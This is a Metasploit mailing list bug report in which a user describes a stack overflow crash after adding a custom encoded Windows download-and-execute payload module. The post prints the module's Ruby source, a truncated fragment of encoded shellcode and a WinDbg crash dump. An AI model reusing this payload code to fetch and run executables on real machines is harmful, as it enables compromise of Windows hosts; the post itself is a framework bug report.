Metasploit mailing list archives
Trying to create my own payload resulted in stack overflow
From: herzel levy <herzelevy () gmail com>
Date: Thu, 2 Dec 2010 21:55:18 +0200
Hi, I'm not experienced with developing to the framework or reporting bugs and I hope I'm doing it the right way. I was trying to create an encoded version of the Download_Exec.rb payload using the shikata ga nai and the alpha upper encoders which resulted in a very big payload. I put my payload at 'msf3\modules\payloads\singles\windows' and started Metasploit. Metasploit then crashed with a stack overflow error. I attached the crash dump and the payload I created. Metasploit version: 3.5.1-dev.11003 Environment: Win7 x86 *The payload looks somthing like that:* require 'msf/core' require 'msf/core/payload/windows/exec' module Metasploit3 include Msf::Payload::Windows include Msf::Payload::Single def initialize(info = {}) super(update_info(info, 'Name' => 'Windows Executable Download and Execute', 'Version' => '$Revision: 9488 $', 'Description' => 'Download an EXE from an HTTP URL and execute it', 'Author' => [ 'lion[at]cnhonker.com', 'pita[at]mail.com' ], 'License' => BSD_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_X86, 'Privileged' => false, 'Payload' => { 'Offsets' => { }, 'Payload' => "\xb8\xf3\x11\x7c\xdb\x29\xc9\x66\xb9\x30\x3c\xdb\xd4\xd9" + "\x74\x24\xf4\x5f\x31\x47\x11\x03\x47\x11\x83\xef\xfc\xe2" + "\x06\x20\xb5\x65\x99\xa8\x39\x7d\x3f\x96\xeb\xbd\x66\x2a" + "\x32\xc9\xbc\x5f\x9a\x03\xcb\x8f\x26\x13\x23\x33\xc7\x27" + "\xd0\x2d\xbe\xfe\x3d\x9a\x2c\xd3\xa5\xc8\x38\x26\xab\x48" + "\x00\xad\xbb\x53\xea\xf5\x5e\x10\xd0\xae\xe3\x39\xa2\xfa" + ........................................ (1670 lines more like these...) } )) # EXITFUNC is not supported :/ deregister_options('EXITFUNC') # Register command execution options register_options( [ OptString.new('URL', [ true, "The pre-encoded URL to the executable" ]) ], self.class) end # # Constructs the payload # def generate_stage return module_info['Payload']['Payload'] end end *WinDbg crash dump:* Microsoft (R) Windows Debugger Version 6.12.0002.633 X86 Copyright (c) Microsoft Corporation. All rights reserved. *** wait with pending attach Symbol search path is: SRV*C:\windbgsymbols*http://msdl.microsoft.com/download/symbols Executable search path is: ModLoad: 00400000 0046c000 C:\framework\ruby\bin\ruby.exe ModLoad: 77920000 77a5c000 C:\Windows\SYSTEM32\ntdll.dll ModLoad: 76930000 76a04000 C:\Windows\system32\kernel32.dll ModLoad: 75b40000 75b8a000 C:\Windows\system32\KERNELBASE.dll ModLoad: 62d00000 62f23000 C:\framework\ruby\bin\msvcrt-ruby191.dll ModLoad: 76400000 764a0000 C:\Windows\system32\ADVAPI32.DLL ModLoad: 76260000 7630c000 C:\Windows\system32\msvcrt.dll ModLoad: 77660000 77679000 C:\Windows\SYSTEM32\sechost.dll ModLoad: 76720000 767c1000 C:\Windows\system32\RPCRT4.dll ModLoad: 765a0000 765ca000 C:\Windows\system32\IMAGEHLP.DLL ModLoad: 76a10000 77659000 C:\Windows\system32\SHELL32.DLL ModLoad: 75f30000 75f87000 C:\Windows\system32\SHLWAPI.dll ModLoad: 77a70000 77abe000 C:\Windows\system32\GDI32.dll ModLoad: 764b0000 76579000 C:\Windows\system32\USER32.dll ModLoad: 77a60000 77a6a000 C:\Windows\system32\LPK.dll ModLoad: 76360000 763fd000 C:\Windows\system32\USP10.dll ModLoad: 76220000 76255000 C:\Windows\system32\WS2_32.DLL ModLoad: 75d70000 75d76000 C:\Windows\system32\NSI.dll ModLoad: 76580000 7659f000 C:\Windows\system32\IMM32.DLL ModLoad: 75de0000 75eac000 C:\Windows\system32\MSCTF.dll ModLoad: 10000000 1003c000 C:\framework\tools\ConsoleHook.dll ModLoad: 752d0000 752e6000 C:\Windows\system32\CRYPTSP.dll ModLoad: 750a0000 750db000 C:\Windows\system32\rsaenh.dll ModLoad: 757b0000 757bc000 C:\Windows\system32\CRYPTBASE.dll ModLoad: 71280000 71288000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\encdb.so ModLoad: 6ac40000 6ac47000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\iso_8859_8.so ModLoad: 6dd40000 6dd48000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\trans\transdb.so ModLoad: 65480000 65487000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\utf_16le.so ModLoad: 6d400000 6d408000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\trans\utf_16_32.so ModLoad: 628c0000 628db000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\trans\single_byte.so ModLoad: 69800000 69807000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\digest\md5.so ModLoad: 6c640000 6c76b000 C:\framework\ruby\bin\libeay32-0.9.8-msvcrt.dll ModLoad: 75870000 75877000 C:\Windows\system32\WSOCK32.DLL ModLoad: 68000000 68009000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\digest.so ModLoad: 65080000 6508b000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\stringio.so ModLoad: 61c80000 61c90000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\iconv.so ModLoad: 68080000 68174000 C:\framework\ruby\bin\libiconv2.dll ModLoad: 6a400000 6a423000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\zlib.so ModLoad: 6c280000 6c29a000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\dl.so ModLoad: 65000000 65007000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\etc.so ModLoad: 767d0000 7692c000 C:\Windows\system32\ole32.dll ModLoad: 74570000 745b0000 C:\Windows\system32\uxtheme.dll ModLoad: 74740000 748de000 C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_420fe3fa2b8113bd\comctl32.dll ModLoad: 77ac0000 77b4f000 C:\Windows\system32\OLEAUT32.dll ModLoad: 77780000 7791d000 C:\Windows\system32\SETUPAPI.dll ModLoad: 75af0000 75b17000 C:\Windows\system32\CFGMGR32.dll ModLoad: 75b20000 75b32000 C:\Windows\system32\DEVOBJ.dll ModLoad: 76190000 76213000 C:\Windows\system32\CLBCatQ.DLL ModLoad: 745d0000 746c5000 C:\Windows\system32\propsys.dll ModLoad: 743b0000 743d1000 C:\Windows\system32\ntmarta.dll ModLoad: 76310000 76355000 C:\Windows\system32\WLDAP32.dll ModLoad: 69980000 69987000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\continuation.so ModLoad: 6e600000 6e624000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\socket.so ModLoad: 6a1c0000 6a1c7000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\fcntl.so ModLoad: 671c0000 6720a000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\openssl.so ModLoad: 6b380000 6b3c0000 C:\framework\ruby\bin\ssleay32-0.9.8-msvcrt.dll ModLoad: 00770000 0078f000 C:\framework\ruby\bin\ZLIB1.dll ModLoad: 67300000 67307000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\shift_jis.so ModLoad: 65600000 6560a000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\strscan.so ModLoad: 6ce00000 6ce2a000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\syck.so ModLoad: 75970000 7597b000 C:\Windows\system32\profapi.dll ModLoad: 652c0000 652c7000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\digest\sha1.so ModLoad: 64800000 64807000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\euc_jp.so ModLoad: 75760000 757ab000 C:\Windows\system32\apphelp.dll ModLoad: 6a640000 6a658000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\bigdecimal.so ModLoad: 6fac0000 6fac9000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\json\ext\parser.so ModLoad: 70f40000 70f47000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\utf_16be.so ModLoad: 6ffc0000 6ffc7000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\utf_32be.so ModLoad: 6d100000 6d107000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\utf_32le.so ModLoad: 6adc0000 6adcd000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\json\ext\generator.so ModLoad: 70380000 704a1000 C:\framework\ruby\lib\ruby\gems\1.9.1\gems\pg-0.9.0-x86-mingw32\lib\1.9\pg_ext.so ModLoad: 755c0000 755c8000 C:\Windows\system32\SECUR32.dll ModLoad: 75740000 7575a000 C:\Windows\system32\SSPICLI.DLL ModLoad: 75290000 752cc000 C:\Windows\system32\mswsock.dll ModLoad: 74df0000 74df5000 C:\Windows\System32\wshtcpip.dll ModLoad: 61b80000 61bbb000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\nkf.so (c54.1180): Stack overflow - code c00000fd (!!! second chance !!!) eax=067c1298 ebx=0000002b ecx=065ac890 edx=000331a0 esi=00000022 edi=00000000 eip=62e3eafd esp=00032ee0 ebp=00033398 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\framework\ruby\bin\msvcrt-ruby191.dll - msvcrt_ruby191!rb_iseq_translate_threaded_code+0x383d: 62e3eafd 89bd2cfcffff mov dword ptr [ebp-3D4h],edi ss:0023:00032fc4=00000000 Cheers, Herzel
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Trying to create my own payload resulted in stack overflow herzel levy (Dec 02)